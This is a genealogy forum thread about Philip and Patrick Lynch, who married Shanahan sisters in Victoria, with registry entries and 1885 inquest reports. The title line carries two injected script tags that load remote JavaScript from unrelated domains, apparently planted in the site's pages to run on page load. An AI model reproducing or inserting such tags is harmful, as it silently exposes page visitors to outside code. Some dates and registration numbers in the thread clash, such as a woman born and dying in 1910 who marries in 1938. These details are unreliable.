Looking for ancestors and descendants of of Philip and Patrick Lynch. Two brothers married two sisters <script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for ancestors and descendants of of Philip and Patrick Lynch. Two brothers married two sisters

Query by hayseed

On 3 November 1853 in Brighton Victoria ELLEN SHANAHAN married PHILIP LYNCH R$1231/1853 R.C.Rites. He is the son of LAURENCE LYNCH and MARY O'BRIEN. He was born in 1812 in County Westmeath Ireland, and died 1897 in Brighton Victoria R1897/8019. He was buried 17 September 1897 Brighton General Cemetery R.C "C"127 Burial No.4009 marked only with an iron fence, no headstone. His son, JOHN MORRIS LYNCH is buried with his father.
ELLEN died in Brighton Victoria R572/1916 age 77 years buried Brighton General Cemetery R.C "J" 220 unmarked.
Three of Ellen and Philips daughters ANN R13550 died 10 November 1919, MARGARET MARY R45446 died 25 March 1952 and EMILY R 48462 died 15 May 1956 are buried in the same grave, unmarked, as their mother.

PHILIP LYNCH AND ELLEN SHANAHAN had eight children CATHERINE LYNCH BORN 25 Nov 1854 IN North Brighton Victoria R R5536/1854. She died 22 June 1927 in Hay NSW R9703/1926. She married ROBERT McCORMICK Hay NSW R46/1881 Presbyterian Rites. They were selectors South Side Hay District, Grandparents of MARION MYERS. They had eight children, (i)EMILY (MAGGIE) MARGARET born 22 Sept 1882, (ii) ROBERT (BOB) 31 Jan 1884, (iii)ELLEN (NELL) RACHEL 19 Sept 1886, (iv) ANN BOYD 15.Apr 1892 and buried same day. (v JESSIE KATHLEEN born abt 1894, (vi) HUGH PHILIP 29 Jan 1895 (vii) ARTHUR BROOKS 16 Sept 1896 died 1 Oct 1966 Hay buried Robert McCormick family enclosure Hay Cemetery. He married DOLLY ANSTICE Hay R4998/1938 Hay NSW she was born 11 March 1910 in Hay NSW and died in Broken Hill 10 May 1910, cremated ashes Hay Lawn Cemetery Row L Plot 21. ARTHUR AND DOLLY parents of MARION MYERS and ERIC McCORMICK. (viii) JEAN ISABEL 30 Nov 1898.
Parents of ROBERT McCORMICK, HUGH McCORMICK born abt 1800 died 25 Jan 1876 buried HUGH McCORMICK family burial ground Derryloranh Old Church Yard near Ballyreagh Northern Ireland Age 76 yrs. He married RACHEL M BROOKS SHE WAS BORN ABOUT 1811 AND DIED 13 jan 1871 BURIED family burial ground Derryloran.

PATRICK LYNCH and BRIDGET SHANAHAN married 1862 in Melbourne R454/1862, son of LAURENCE LYNCH and MARY O'BRIEN. They had seven children (i) ELLEN 1863, (ii) MARY JANE 1864, (iii) MARGARET abt 1866, died 1868 (iv) JOHN THOMAS 1869, (v) JAMES HENRY 1871, (vi) PATRICK 1873 died 1873 (vii) MICHAEL 16 May 1874, died age 22 hrs. He is buried with his mother BRIDGET died 20 May 1874 R5861/1874 Oakley Cemetery age 28years.

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by hayseed Profile | Research | Contact | Subscribe | Block this user
on 2012-04-23 21:20:34

hayseed has been a Family Tree Circles member since Apr 2012.

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by MarkSmith on 2016-03-10 18:36:25

Good Morning Hayseed,
My wife is a descendant of the McCormicks of Hay and I have done some research and also traced the McCormicks back to Lynch and Shanahan families. I always thought it probable that the two Lynchs were brothers and married the two Shanahan sisters, but never managed to find out what happened to Patrick Lynch (who married Bridget Shanahan). I am happy to share what information I have with you.


Mark Smith

by MarkSmith on 2019-06-16 00:36:33

Just a quick update on this thread. I have since found that the Patrick Lynch who married Bridget Shanahan in 1862 died on 2 Jun 1885 in East Brighton. VIC BDM death reg.6365/1885 lists his mother as Ellen Reynolds, his age as 56 and his spouse as Bridget Shanaghan. Given an age of 56, he was born about 1830 (no indication of where).
Given age and mother's name it is quite likely that Patrick Lynch and Phillip Lynch were likely not brothers (Irish records indicate that Philip did indeed have an older brother named Patrick but born in 1808), but they still may have been related in some way.
More to work on!
Mark Smith

by janilye on 2019-06-16 12:34:56

The Age Fri 5 June 1885
A magisterial inquiry was held on Wednesday, belore Mr. J. Jordan, J.P., respecting the death of Patrick Lynch, a very old resident of the shire of Moorabbin, who died suddenly on the previous day. A verdict of death from heart disease was recorded.
South Bourke and Mornington Journal, Wed 10 June 1885
A magisterial inquiry was held, on Wednesday before Mr. J. Jordan, J.P.,
concerning the death of Patrick Lynch, a very old resident of East Brighton, who expired suddenly at his residence on the North road on the previous day. Annie Reid deposed that on the 2nd of June she brought to the deceased, who was her uncle, some milk about mid-day. Witness knocked at the front door, but receiving no answer, turned to go home again.
When passing the stable she saw her uncle laying down with his head just
outside the door. Being frightened she immediately ran and told her mother, and both returned and endeavored to revive deceased, but he never rallied or spoke. With assistance they carried him to his bedroom.
—Hannah Reid, the mother of the previous witness, stated that at noon
of the 2nd inst. her daughter told her she thought her uncle was dying, and
they found him in the position described by her daughter. Robert Scarlett, a
neighbor, helped them to carry the corpse into the house. Witness then sent for Doctor Anderson Irwin and the police. -
Robert Scarlett, a laborer, residing in the Shire of Moorabbin, corroborated the evidence of the previous witness.
—Doctor Irwin, a duly qualified medical practitioner, residing at Caulfield, said the body of deceased was that of a well-nourished man. There were no external marks or signs of violence. Upon opening the chest he found clots of blood in the pericardium, with a large rupture opposite the aortic valve, and there were also small bony [??ercles] on the aorta. The heart was enlarged, and there were indications of fatty degeneration. The other organs were in a healthy state. The cause of death was rupture of the aorta.
—A verdict of death from heart disease was recorded.

by janilye on 2019-06-16 12:53:57

Event: deaths
Registration number 14818 / 1915
Family name: REID
Given name(s) Hannah
Place of event: Murrumbeena, Victoria, Australia
Personal detail
Mother's name, Eleanor
Mother's family name at birth NORRIS
Father's Name: James SHANAHAN

by janilye on 2019-06-16 13:16:59

The Argus Wed 15 Dec 1915
REID.—On the 14th December, at the residence of her son,
"Ravensworth," Inella road, Murrumbeena,
Hannah, relict of the late William Reid, of Murrumbeena,
and loving mother of James, Thomas, William, and John Reid, and of Mrs.
Lanfear, Mrs. Lucas, Mrs. Woodhead, Mrs. O'Sullivan,
and Mrs. Tuminello. aged 75 years.
A colonist of 74 years.

BD&M Victoria
Event: deaths
Registration number 6356 / 1885
Family name: LYNCH
Given name(s) Patrick
Place of event: Oakleigh, Australia
Personal detail
Mother's name: Ellen
Mother's family name at birth REYNOLDS
Father's Name: Unknown

Record information
Event: deaths
Registration number 8019 / 1897
Family name: LYNCH
Given name(s) Philip
Place of event: Brighton, Australia
Personal detail
Mother's name Mary
Mother's family name at birth O'BRIEN

by MarkSmith on 2019-06-21 07:33:51

Hi Janilye,
Thanks for the follow-up information. Indeed it was the Age article on the inquiry that lead me to partly sorting this out. I followed up on Annie Reid's relation to the deceased Patrick Lynch and found her mother Johanah (or Hannah) was a "missing" sibling to Ellen and Bridget Shanahan from Hayseed's first posting above.
Are you also researching this family?


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